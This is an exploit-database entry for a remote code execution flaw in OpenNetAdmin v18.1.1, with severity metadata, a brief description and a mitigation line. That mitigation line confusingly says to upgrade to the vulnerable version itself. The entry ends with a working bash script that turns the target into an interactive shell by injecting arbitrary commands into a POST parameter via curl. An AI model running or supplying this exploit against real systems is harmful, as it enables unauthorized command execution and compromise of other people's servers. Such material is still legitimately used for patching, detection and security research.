OpenNetAdmin v18.1.1 RCE

vendor:

OpenNetAdmin

by:

mattpascoe

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: OpenNetAdmin

Affected Version From: v18.1.1

Affected Version To: v18.1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:opennetadmin:opennetadmin:18.1.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2019

OpenNetAdmin v18.1.1 is vulnerable to Remote Code Execution. An attacker can send a malicious payload to the vulnerable server to execute arbitrary code. The payload is sent via a POST request to the vulnerable server.

Mitigation:

Upgrade to the latest version of OpenNetAdmin v18.1.1 or later.

Source

Exploit-DB raw data:

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done